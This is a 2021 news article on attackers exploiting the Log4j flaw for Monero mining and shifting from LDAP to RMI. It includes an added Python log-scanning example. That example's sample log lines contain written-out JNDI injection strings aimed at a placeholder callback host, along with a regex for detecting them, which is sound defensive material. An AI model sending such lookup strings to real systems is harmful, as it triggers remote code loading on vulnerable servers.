Date: 2021-12-17

Experts say the attack on Log4j could affect millions of devices for YEARS, so attackers are switching tactics to make money.

EXPERTS WARN that threat actors exploiting Apache Log4j to secure Monero mining resources are changing their tactics.

In order to increase their chances of success, some of the attackers exploiting the Apache Log4j vulnerability, which experts predict will last for years, have switched from LDAP to RMI.

Until recently, the majority of attacks on the Java-based logging utility used LDAP (Lightweight Directory Access Protocol).

Hackers have discovered that switching to RMI (Remote Method Invocation) allows them to avoid additional security checkpoints in some cases.

Furthermore, because some JVM (Java Virtual Machine) versions have fewer restrictions, RMI can be a faster way to get RCE (remote code execution) than LDAP.

Juniper Labs discovered that some threat actors are attempting to exploit Log4j’s vulnerability using both LDAP and RMI in the hopes of increasing their chances of success.
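A log check that covers both protocols, since a rule matching only LDAP lookups would miss the RMI variant described above. This is an added example, not code from the article or from Juniper Labs: the `${jndi:...}` lookup syntax is the standard Log4j form, the log lines, IP addresses and host names are constructed, and only plain and percent-encoded lookups are matched.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Matches a Log4j lookup of the form ${jndi:<scheme>:/...} and captures the scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/", re.IGNORECASE)

# Constructed sample access-log lines (not real traffic); hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"',
    '203.0.113.7 - - [17/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://callback.example:1099/a}"',
    '198.51.100.4 - - [17/Dec/2021:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [17/Dec/2021:10:03:44 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fcallback.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]


def find_jndi_schemes(line):
    """Return the lowercase JNDI schemes referenced in one log line."""
    decoded = unquote(line)  # also catch percent-encoded lookups in URLs
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(decoded)]


def summarize(lines):
    """Count JNDI lookup attempts per (source IP, scheme)."""
    hits = Counter()
    for line in lines:
        src = line.split(" ", 1)[0]  # first field of the access-log line
        for scheme in find_jndi_schemes(line):
            hits[(src, scheme)] += 1
    return hits


def sources_trying_both(hits):
    """Source IPs seen with both LDAP and RMI lookups."""
    by_src = {}
    for src, scheme in hits:
        by_src.setdefault(src, set()).add(scheme)
    return sorted(s for s, schemes in by_src.items() if {"ldap", "rmi"} <= schemes)


if __name__ == "__main__":
    hits = summarize(SAMPLE_LOG)
    for (src, scheme), count in sorted(hits.items()):
        print(src, scheme, count)
    print("both protocols:", sources_trying_both(hits))
```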

Some of the attackers appear to be pursuing a single goal: stealing resources in order to mine Monero, a unique type of cryptocurrency.

According to Juniper Labs’ reports, threat actors have described the activity as “not going to harm anyone else.”

Since the vulnerability, which puts systems running Apache Log4j version 2.14.1 or lower at risk, was discovered last week, the cybersecurity community has been on high alert.

“As soon as I saw how you could exploit it, it was horrifying,” said Peter Membrey, ExpressVPN’s chief architect.

“It’s like one of those disaster movies where they discover a nuclear power plant is about to melt down and can’t stop it.

“You know what’s coming, but there’s only so much you can do.”

Experts have been working feverishly to identify vulnerable programs and prevent exploits wherever possible, and the Cybersecurity and Infrastructure Security Agency (CISA) has compiled a list of hundreds of them.

Meanwhile, experts estimate that thousands of applications are affected.

“I ran queries in our database to see who was using Log4j in any of their applications, and the answer was: every single one of them,” Tidelift co-founder Jeremy Katz said.

